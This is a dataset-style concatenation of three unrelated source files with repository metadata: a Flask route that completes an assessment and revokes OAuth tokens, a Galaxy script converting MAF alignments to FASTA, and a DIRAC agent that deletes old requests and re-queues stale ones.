        "use of deprecated API %s from referer %s",
        request.url,
        request.headers.get('Referer'),
    )
    return present_assessment(instruments=[instrument_id])
@assessment_engine_api.route('/api/complete-assessment')
@crossdomain()
@oauth.require_oauth()
def complete_assessment():
    """Return to the last intervention that requested an assessment be presented

    Redirects to the URL passed to TrueNTH when present-assessment was last
    called (if valid) or TrueNTH home
    ---
    operationId: complete_assessment
    tags:
      - Internal
    produces:
      - text/html
    responses:
      303:
        description: successful operation
        headers:
          Location:
            description:
              URL passed to TrueNTH when present-assessment was last
              called (if valid) or TrueNTH home
            type: string
            format: url
      401:
        description: if missing valid OAuth token
    security:
      - ServiceToken: []
      - OAuth2AuthzFlow: []

    """
    # Return URL stored in the session by present_assessment; fall back
    # to portal root when none was stored
    next_url = session.pop("assessment_return", "/")
    # Logout Assessment Engine after survey completion
    for token in INTERVENTION.ASSESSMENT_ENGINE.client.tokens:
        # only revoke tokens belonging to the current user
        if token.user != current_user():
            continue
        current_app.logger.debug(
            "assessment complete, logging out user: %s", token.user.id)
        # notify the assessment engine of the logout before deleting
        # the token, so it can clean up its own session state
        INTERVENTION.ASSESSMENT_ENGINE.client.notify({
            'event': 'logout',
            'user_id': token.user.id,
            'refresh_token': token.refresh_token,
            'info': 'complete-assessment',
        })
        db.session.delete(token)
        db.session.commit()
    current_app.logger.debug("assessment complete, redirect to: %s", next_url)
    return redirect(next_url, code=303)
|
uwcirg/true_nth_usa_portal
|
portal/views/assessment_engine.py
|
Python
|
bsd-3-clause
| 76,196
|
[
"VisIt"
] |
b58538db2701f63bbca43eb1641df937e44aa88f3ab288499ae92d5ae73de4f1
|
#!/usr/bin/env python
"""
Read a maf and print the text as a fasta file, concatenating blocks
usage %prog species1,species2 maf_file out_file
"""
#Dan Blankenberg
import sys
from galaxy import eggs
import pkg_resources; pkg_resources.require( "bx-python" )
from bx.align import maf
from galaxy.tools.util import maf_utilities
assert sys.version_info[:2] >= ( 2, 4 )
def __main__():
print "Restricted to species:", sys.argv[1]
texts = {}
input_filename = sys.argv[2]
output_filename = sys.argv[3]
species = sys.argv[1].split( ',' )
if "None" in species:
species = maf_utilities.get_species_in_maf( input_filename )
file_out = open( output_filename, 'w' )
for spec in species:
file_out.write( ">" + spec + "\n" )
try:
for block in maf.Reader( open( input_filename, 'r' ) ):
component = block.get_component_by_src_start( spec )
if component: file_out.write( component.text )
else: file_out.write( "-" * block.text_size )
except:
print >>sys.stderr, "Your MAF file appears to be malformed."
sys.exit()
file_out.write( "\n" )
file_out.close()
if __name__ == "__main__": __main__()
|
dbcls/dbcls-galaxy
|
tools/maf/maf_to_fasta_concat.py
|
Python
|
mit
| 1,262
|
[
"Galaxy"
] |
5e74632921a4bc924aef2f6e98a19ac2ff77f4d313d51517e6a05aed66904c0d
|
########################################################################
# $HeadURL $
# File: CleanReqDBAgent.py
# Author: Krzysztof.Ciba@NOSPAMgmail.com
# Date: 2013/05/17 08:31:26
########################################################################
"""Cleaning the RequestDB from obsolete records and kicking assigned requests
.. literalinclude:: ../ConfigTemplate.cfg
:start-after: ##BEGIN CleanReqDBAgent
:end-before: ##END
:dedent: 2
:caption: CleanReqDBAgent options
.. moduleauthor:: Krzysztof.Ciba@NOSPAMgmail.com
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__RCSID__ = "$Id$"
# #
# @file CleanReqDBAgent.py
# @author Krzysztof.Ciba@NOSPAMgmail.com
# @date 2013/05/17 08:32:08
# @brief Definition of CleanReqDBAgent class.
# # imports
import datetime
# # from DIRAC
from DIRAC import S_OK
from DIRAC.FrameworkSystem.Client.MonitoringClient import gMonitor
from DIRAC.Core.Base.AgentModule import AgentModule
from DIRAC.RequestManagementSystem.Client.ReqClient import ReqClient
from DIRAC.RequestManagementSystem.Client.Request import Request
AGENT_NAME = "RequestManagement/CleanReqDBAgent"
########################################################################
class CleanReqDBAgent(AgentModule):
    """
    .. class:: CleanReqDBAgent

    Agent that periodically deletes old finished (optionally also failed)
    requests from the RequestDB and re-puts stale 'Assigned' requests so
    they may be processed again.  The class attributes below are defaults,
    each overridable via agent options (see :meth:`initialize`).
    """
    # default grace period (days) before a finished request is deleted
    DEL_GRACE_DAYS = 60
    # maximum number of requests deleted per agent cycle
    DEL_LIMIT = 100
    # default grace period (hours) before an 'Assigned' request is kicked
    KICK_GRACE_HOURS = 1
    # maximum number of requests kicked per agent cycle
    KICK_LIMIT = 10000
    # when True, requests in failed-type states are deleted as well
    DEL_FAILED = False
    # lazily constructed ReqClient instance, see requestClient()
    __requestClient = None
def requestClient(self):
""" request client getter """
if not self.__requestClient:
self.__requestClient = ReqClient()
return self.__requestClient
def initialize(self):
""" initialization """
self.DEL_GRACE_DAYS = self.am_getOption("DeleteGraceDays", self.DEL_GRACE_DAYS)
self.log.info("Delete grace period = %s days" % self.DEL_GRACE_DAYS)
self.DEL_LIMIT = self.am_getOption("DeleteLimit", self.DEL_LIMIT)
self.log.info("Delete limit = %s request/cycle" % self.DEL_LIMIT)
self.DEL_FAILED = self.am_getOption("DeleteFailed", self.DEL_FAILED)
self.log.info("Delete failed requests: %s" % {True: "yes", False: "no"}[self.DEL_FAILED])
self.KICK_GRACE_HOURS = self.am_getOption("KickGraceHours", self.KICK_GRACE_HOURS)
self.log.info("Kick assigned requests period = %s hours" % self.KICK_GRACE_HOURS)
self.KICK_LIMIT = self.am_getOption("KickLimit", self.KICK_LIMIT)
self.log.info("Kick limit = %s request/cycle" % self.KICK_LIMIT)
# # gMonitor stuff
gMonitor.registerActivity("DeletedRequests", "Deleted finished requests",
"CleanReqDBAgent", "Requests/min", gMonitor.OP_SUM)
gMonitor.registerActivity("KickedRequests", "Assigned requests kicked",
"CleanReqDBAgent", "Requests/min", gMonitor.OP_SUM)
return S_OK()
def execute(self):
""" execution in one cycle """
now = datetime.datetime.utcnow()
kickTime = now - datetime.timedelta(hours=self.KICK_GRACE_HOURS)
rmTime = now - datetime.timedelta(days=self.DEL_GRACE_DAYS)
# # kick
statusList = ["Assigned"]
requestIDsList = self.requestClient().getRequestIDsList(statusList, self.KICK_LIMIT)
if not requestIDsList["OK"]:
self.log.error("execute: %s" % requestIDsList["Message"])
return requestIDsList
requestIDsList = requestIDsList["Value"]
kicked = 0
for requestID, status, lastUpdate in requestIDsList:
reqStatus = self.requestClient().getRequestStatus(requestID)
if not reqStatus['OK']:
self.log.error(("execute: unable to get request status", reqStatus['Message']))
continue
status = reqStatus['Value']
if lastUpdate < kickTime and status == 'Assigned':
getRequest = self.requestClient().peekRequest(requestID)
if not getRequest["OK"]:
self.log.error("execute: unable to read request '%s': %s" % (requestID, getRequest["Message"]))
continue
getRequest = getRequest["Value"]
if getRequest and getRequest.LastUpdate < kickTime:
self.log.info("execute: kick assigned request (%s/'%s') in status %s" % (requestID,
getRequest.RequestName,
getRequest.Status))
putRequest = self.requestClient().putRequest(getRequest)
if not putRequest["OK"]:
self.log.error("execute: unable to put request (%s/'%s'): %s" % (requestID,
getRequest.RequestName,
putRequest["Message"]))
continue
else:
self.log.verbose("Kicked request %d" % putRequest['Value'])
kicked += 1
# # delete
statusList = ["Done", "Failed", "Canceled"] if self.DEL_FAILED else ["Done"]
requestIDsList = self.requestClient().getRequestIDsList(statusList, self.DEL_LIMIT)
if not requestIDsList["OK"]:
self.log.error("execute: %s" % requestIDsList["Message"])
return requestIDsList
requestIDsList = requestIDsList["Value"]
deleted = 0
for requestID, status, lastUpdate in requestIDsList:
if lastUpdate < rmTime:
self.log.info("execute: deleting request '%s' with status %s" % (requestID, status))
delRequest = self.requestClient().deleteRequest(requestID)
if not delRequest["OK"]:
self.log.error("execute: unable to delete request '%s': %s" % (requestID, delRequest["Message"]))
continue
deleted += 1
gMonitor.addMark("KickedRequests", kicked)
gMonitor.addMark("DeletedRequests", deleted)
self.log.info("execute: kicked assigned requests = %s" % kicked)
self.log.info("execute: deleted finished requests = %s" % deleted)
return S_OK()
|
yujikato/DIRAC
|
src/DIRAC/RequestManagementSystem/Agent/CleanReqDBAgent.py
|
Python
|
gpl-3.0
| 6,076
|
[
"DIRAC"
] |
a1e6c553fd9fcecd7f5e253273f09000f28afa57c5ffcd83ec5c865d37c8ce3d
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.